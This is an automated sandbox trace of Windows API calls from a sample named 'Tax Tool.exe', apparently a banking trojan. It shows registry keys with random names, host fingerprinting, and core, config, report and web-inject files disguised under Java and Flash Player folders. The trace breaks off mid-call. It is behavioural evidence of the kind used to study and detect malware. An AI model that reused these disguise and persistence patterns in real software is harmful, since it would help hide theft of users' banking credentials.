[0057.807] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.807] RegEnumKeyW (in: hKey=0x210, dwIndex=0xe, lpName=0x9aeb74, cchName=0xa | out: lpName="FTP") returned 0x0 [0057.807] RegCreateKeyExW (in: hKey=0x210, lpSubKey="FTP", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x9aeb38, lpdwDisposition=0x0 | out: phkResult=0x9aeb38*=0x214, lpdwDisposition=0x0) returned 0x0 [0057.807] RegCloseKey (hKey=0x214) returned 0x0 [0057.807] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.808] RegEnumKeyW (in: hKey=0x210, dwIndex=0x30, lpName=0x9aeb74, cchName=0xa | out: lpName="") returned 0xea [0057.808] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.808] RegEnumKeyW (in: hKey=0x210, dwIndex=0x15, lpName=0x9aeb74, cchName=0xa | out: lpName="") returned 0xea [0057.808] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.808] RegEnumKeyW (in: hKey=0x210, dwIndex=0x2f, lpName=0x9aeb74, cchName=0xa | out: lpName="Windows") returned 0x0 [0057.808] RegCreateKeyExW (in: hKey=0x210, lpSubKey="Windows", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x9aeb38, lpdwDisposition=0x0 | out: phkResult=0x9aeb38*=0x214, lpdwDisposition=0x0) returned 0x0 [0057.808] RegCloseKey (hKey=0x214) returned 0x0 [0057.808] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.809] RegEnumKeyW (in: hKey=0x210, dwIndex=0x1c, lpName=0x9aeb74, cchName=0xa | out: lpName="Osk") returned 0x0 [0057.809] RegCreateKeyExW (in: hKey=0x210, lpSubKey="Osk", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x9aeb38, lpdwDisposition=0x0 | out: phkResult=0x9aeb38*=0x214, lpdwDisposition=0x0) returned 0x0 [0057.809] RegCloseKey (hKey=0x214) returned 0x0 [0057.809] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.809] RegEnumKeyW (in: hKey=0x210, dwIndex=0x2d, lpName=0x9aeb74, cchName=0xa | out: lpName="WcmSvc") returned 0x0 [0057.809] RegCreateKeyExW (in: hKey=0x210, lpSubKey="WcmSvc", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x9aeb38, lpdwDisposition=0x0 | out: phkResult=0x9aeb38*=0x214, lpdwDisposition=0x0) returned 0x0 [0057.809] RegCloseKey (hKey=0x214) returned 0x0 [0057.810] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.810] RegEnumKeyW (in: hKey=0x210, dwIndex=0x25, lpName=0x9aeb74, cchName=0xa | out: lpName="SkyDrive") returned 0x0 [0057.810] RegCreateKeyExW (in: hKey=0x210, lpSubKey="SkyDrive", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x9aeb38, lpdwDisposition=0x0 | out: phkResult=0x9aeb38*=0x214, lpdwDisposition=0x0) returned 0x0 [0057.810] RegCloseKey (hKey=0x214) returned 0x0 [0057.810] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.810] RegEnumKeyW (in: hKey=0x210, dwIndex=0x33, lpName=0x9aeb74, cchName=0xa | out: lpName="") returned 0xea [0057.810] RegCreateKeyExW (in: hKey=0x210, lpSubKey="Cuxiy", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x9aeb38, lpdwDisposition=0x0 | out: phkResult=0x9aeb38*=0x214, lpdwDisposition=0x0) returned 0x0 [0057.811] RegCloseKey (hKey=0x214) returned 0x0 [0057.811] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x36, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.811] RegEnumKeyW (in: hKey=0x210, dwIndex=0x14, lpName=0x9aeb74, cchName=0xa | out: lpName="Java VM") returned 0x0 [0057.811] RegCreateKeyExW (in: hKey=0x210, lpSubKey="Java VM", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x9aeb38, lpdwDisposition=0x0 | out: phkResult=0x9aeb38*=0x214, lpdwDisposition=0x0) returned 0x0 [0057.811] RegCloseKey (hKey=0x214) returned 0x0 [0057.811] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x36, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.811] RegEnumKeyW (in: hKey=0x210, dwIndex=0x2a, lpName=0x9aeb74, cchName=0xa | out: lpName="") returned 0xea [0057.811] RegCreateKeyExW (in: hKey=0x210, lpSubKey="Hayfra", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x9aeb38, lpdwDisposition=0x0 | out: phkResult=0x9aeb38*=0x214, lpdwDisposition=0x0) returned 0x0 [0057.812] RegCloseKey (hKey=0x214) returned 0x0 [0057.812] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x37, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.812] RegEnumKeyW (in: hKey=0x210, dwIndex=0x22, lpName=0x9aeb74, cchName=0xa | out: lpName="Poom") returned 0x0 [0057.812] RegCreateKeyExW (in: hKey=0x210, lpSubKey="Poom", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x9aeb38, lpdwDisposition=0x0 | out: phkResult=0x9aeb38*=0x214, lpdwDisposition=0x0) returned 0x0 [0057.812] RegCloseKey (hKey=0x214) returned 0x0 [0057.812] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x37, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.812] RegEnumKeyW (in: hKey=0x210, dwIndex=0x23, lpName=0x9aeb74, cchName=0xa | out: lpName="") returned 0xea [0057.812] RegCreateKeyExW (in: hKey=0x210, lpSubKey="Ygizgo", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x9aeb38, lpdwDisposition=0x0 | out: phkResult=0x9aeb38*=0x214, lpdwDisposition=0x0) returned 0x0 [0057.813] RegCloseKey (hKey=0x214) returned 0x0 [0057.813] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x38, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.813] RegEnumKeyW (in: hKey=0x210, dwIndex=0x19, lpName=0x9aeb74, cchName=0xa | out: lpName="") returned 0xea [0057.813] RegCreateKeyExW (in: hKey=0x210, lpSubKey="Fabo", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x9aeb38, lpdwDisposition=0x0 | out: phkResult=0x9aeb38*=0x214, lpdwDisposition=0x0) returned 0x0 [0057.813] RegCloseKey (hKey=0x214) returned 0x0 [0057.813] RegCloseKey (hKey=0x210) returned 0x0 [0057.813] GetComputerNameW (in: lpBuffer=0x9ae9ac, nSize=0x9ae964 | out: lpBuffer="7ZA1P8WI", nSize=0x9ae964) returned 1 [0057.813] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x1, phkResult=0x9ae920 | out: phkResult=0x9ae920*=0x210) returned 0x0 [0057.813] RegQueryValueExW (in: hKey=0x210, lpValueName="InstallDate", lpReserved=0x0, lpType=0x9ae940, lpData=0x9ae944, lpcbData=0x9ae938*=0x4 | out: lpType=0x9ae940*=0x4, lpData=0x9ae944*=0x0, lpcbData=0x9ae938*=0x4) returned 0x0 [0057.813] RegCloseKey (hKey=0x210) returned 0x0 [0057.814] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x1, phkResult=0x9ae940 | out: phkResult=0x9ae940*=0x210) returned 0x0 [0057.814] RegQueryValueExW (in: hKey=0x210, lpValueName="DigitalProductId", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x9ae950*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x9ae950*=0x0) returned 0x2 [0057.814] RegCloseKey (hKey=0x210) returned 0x0 [0057.814] GetVersionExW (in: lpVersionInformation=0x9aea28*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x9aea28*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0057.814] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0x9ae93c | out: pszPath="C:\\Windows") returned 0x0 [0057.814] PathAddBackslashW (in: pszPath="C:\\Windows" | out: pszPath="C:\\Windows\\") returned="" [0057.814] GetVolumeNameForVolumeMountPointW (in: lpszVolumeMountPoint="C:\\Windows\\", lpszVolumeName=0x9ae874, cchBufferLength=0x64 | out: lpszVolumeName="") returned 0 [0057.816] PathRemoveBackslashW (in: pszPath="C:\\Windows\\" | out: pszPath="C:\\Windows") returned="" [0057.816] PathRemoveFileSpecW (in: pszPath="C:\\Windows" | out: pszPath="C:\\") returned 1 [0057.816] PathAddBackslashW (in: pszPath="C:\\" | out: pszPath="C:\\") returned="" [0057.816] GetVolumeNameForVolumeMountPointW (in: lpszVolumeMountPoint="C:\\", lpszVolumeName=0x9ae874, cchBufferLength=0x64 | out: lpszVolumeName="\\\\?\\Volume{2bd2c9f3-0000-0000-0000-100000000000}\\") returned 1 [0057.816] CLSIDFromString (in: lpsz="{2bd2c9f3-0000-0000-0000-100000000000}", pclsid=0x9aebce | out: pclsid=0x9aebce*(Data1=0x2bd2c9f3, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x10, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x0 [0057.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Sun\\Java\\Devices.exe", cchWideChar=20, lpMultiByteStr=0x9aec02, cbMultiByte=150, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Sun\\Java\\Devices.exe", lpUsedDefaultChar=0x0) returned 20 [0057.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe", cchWideChar=92, lpMultiByteStr=0x9aec98, cbMultiByte=150, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe", lpUsedDefaultChar=0x0) returned 92 [0057.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Adobe\\Flash Player\\Desktop (create shortcut).igb", cchWideChar=48, lpMultiByteStr=0x9aed2e, cbMultiByte=150, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Adobe\\Flash Player\\Desktop (create shortcut).igb", lpUsedDefaultChar=0x0) returned 48 [0057.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Adobe\\Flash Player\\Windows PowerShell (x86).ezu", cchWideChar=47, lpMultiByteStr=0x9aedc4, cbMultiByte=150, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Adobe\\Flash Player\\Windows PowerShell (x86).ezu", lpUsedDefaultChar=0x0) returned 47 [0057.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Fabo", cchWideChar=4, lpMultiByteStr=0x9aee5a, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Fabo", lpUsedDefaultChar=0x0) returned 4 [0057.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Onpiwaad", cchWideChar=8, lpMultiByteStr=0x9aee64, cbMultiByte=257, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Onpiwaad", lpUsedDefaultChar=0x0) returned 8 [0057.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Pioq", cchWideChar=4, lpMultiByteStr=0x9aee6e, cbMultiByte=257, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Pioq", lpUsedDefaultChar=0x0) returned 4 [0057.817] lstrcmpiA (lpString1="Onpiwaad", lpString2="Pioq") returned -1 [0057.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Vipoug", cchWideChar=6, lpMultiByteStr=0x9aee78, cbMultiByte=257, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Vipoug", lpUsedDefaultChar=0x0) returned 6 [0057.817] lstrcmpiA (lpString1="Onpiwaad", lpString2="Vipoug") returned -1 [0057.817] lstrcmpiA (lpString1="Pioq", lpString2="Vipoug") returned -1 [0057.818] GetLastError () returned 0xea [0057.818] GetLocalTime (in: lpSystemTime=0x9aeb08 | out: lpSystemTime=0x9aeb08*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xf, wMinute=0x2a, wSecond=0x14, wMilliseconds=0xe6)) [0057.818] GetCurrentThreadId () returned 0x7bc [0057.818] GetCurrentProcessId () returned 0x990 [0057.818] wvnsprintfW (in: pszDest=0xdd04a0, cchDest=250, pszFmt="[%02u.%02u.%4u %02u:%02u:%02u] ver=%u.%u.%u, log=0x%04X, PID=0x%04X, TID=0x%04X, LE=%u(0x%X)\r\n%S: ", arglist=0x9aeaac | out: pszDest="[13.10.2016 15:42:20] ver=2.2.5, log=0x0001, PID=0x0990, TID=0x07BC, LE=234(0xEA)\r\nINFO: ") returned 89 [0057.818] wvnsprintfW (in: pszDest=0xdd0552, cchDest=1959, pszFmt="coreFile=[%S], reportFile=[%S], configFile=[%S], webinjectsFile=[%S], regKey=[%S], regDynamicConfig=[%S], regLocalConfig=[%S], regLocalSettings=[%S]", arglist=0x9aeb28 | out: pszDest="coreFile=[Sun\\Java\\Devices.exe], reportFile=[Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe], configFile=[Adobe\\Flash Player\\Desktop (create shortcut).igb], webinjectsFile=[Adobe\\Flash Player\\Windows PowerShell (x86).ezu], regKey=[Fabo], regDynamicConfig=[Onpiwaad], regLocalConfig=[Pioq], regLocalSettings=[Vipoug]") returned 361 [0057.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:42:20] ver=2.2.5, log=0x0001, PID=0x0990, TID=0x07BC, LE=234(0xEA)\r\nINFO: coreFile=[Sun\\Java\\Devices.exe], reportFile=[Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe], configFile=[Adobe\\Flash Player\\Desktop (create shortcut).igb], webinjectsFile=[Adobe\\Flash Player\\Windows PowerShell (x86).ezu], regKey=[Fabo], regDynamicConfig=[Onpiwaad], regLocalConfig=[Pioq], regLocalSettings=[Vipoug]", cchWideChar=450, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 450 [0057.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:42:20] ver=2.2.5, log=0x0001, PID=0x0990, TID=0x07BC, LE=234(0xEA)\r\nINFO: coreFile=[Sun\\Java\\Devices.exe], reportFile=[Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe], configFile=[Adobe\\Flash Player\\Desktop (create shortcut).igb], webinjectsFile=[Adobe\\Flash Player\\Windows PowerShell (x86).ezu], regKey=[Fabo], regDynamicConfig=[Onpiwaad], regLocalConfig=[Pioq], regLocalSettings=[Vipoug]", cchWideChar=450, lpMultiByteStr=0xe4f780, cbMultiByte=451, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:42:20] ver=2.2.5, log=0x0001, PID=0x0990, TID=0x07BC, LE=234(0xEA)\r\nINFO: coreFile=[Sun\\Java\\Devices.exe], reportFile=[Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe], configFile=[Adobe\\Flash Player\\Desktop (create shortcut).igb], webinjectsFile=[Adobe\\Flash Player\\Windows PowerShell (x86).ezu], regKey=[Fabo], regDynamicConfig=[Onpiwaad], regLocalConfig=[Pioq], regLocalSettings=[Vipoug]", lpUsedDefaultChar=0x0) returned 450 [0057.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:42:20] ver=2.2.5, log=0x0001, PID=0x0990, TID=0x07BC, LE=234(0xEA)\r\nINFO: coreFile=[Sun\\Java\\Devices.exe], reportFile=[Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe], configFile=[Adobe\\Flash Player\\Desktop (create shortcut).igb], webinjectsFile=[Adobe\\Flash Player\\Windows PowerShell (x86).ezu], regKey=[Fabo], regDynamicConfig=[Onpiwaad], regLocalConfig=[Pioq], regLocalSettings=[Vipoug]", cchWideChar=450, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 450 [0057.819] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:42:20] ver=2.2.5, log=0x0001, PID=0x0990, TID=0x07BC, LE=234(0xEA)\r\nINFO: coreFile=[Sun\\Java\\Devices.exe], reportFile=[Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe], configFile=[Adobe\\Flash Player\\Desktop (create shortcut).igb], webinjectsFile=[Adobe\\Flash Player\\Windows PowerShell (x86).ezu], regKey=[Fabo], regDynamicConfig=[Onpiwaad], regLocalConfig=[Pioq], regLocalSettings=[Vipoug]", cchWideChar=450, lpMultiByteStr=0xe4fa00, cbMultiByte=451, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:42:20] ver=2.2.5, log=0x0001, PID=0x0990, TID=0x07BC, LE=234(0xEA)\r\nINFO: coreFile=[Sun\\Java\\Devices.exe], reportFile=[Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe], configFile=[Adobe\\Flash Player\\Desktop (create shortcut).igb], webinjectsFile=[Adobe\\Flash Player\\Windows PowerShell (x86).ezu], regKey=[Fabo], regDynamicConfig=[Onpiwaad], regLocalConfig=[Pioq], regLocalSettings=[Vipoug]", lpUsedDefaultChar=0x0) returned 450 [0057.819] GetSystemTime (in: lpSystemTime=0x9ae6f8 | out: lpSystemTime=0x9ae6f8*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xd, wMinute=0x2a, wSecond=0x14, wMilliseconds=0xe6)) [0057.819] SystemTimeToFileTime (in: lpSystemTime=0x9ae6f8, lpFileTime=0x9ae6e8 | out: lpFileTime=0x9ae6e8) returned 1 [0057.819] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tax Tool.exe", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0057.819] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tax Tool.exe", cchWideChar=12, lpMultiByteStr=0xe4fa40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Tax Tool.exe", lpUsedDefaultChar=0x0) returned 12 [0057.819] GetUserNameExW () returned 0x1 [0057.820] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0057.820] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0xe4fac0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", lpUsedDefaultChar=0x0) returned 27 [0057.822] wvnsprintfW (in: pszDest=0x9ae4e0, cchDest=6, 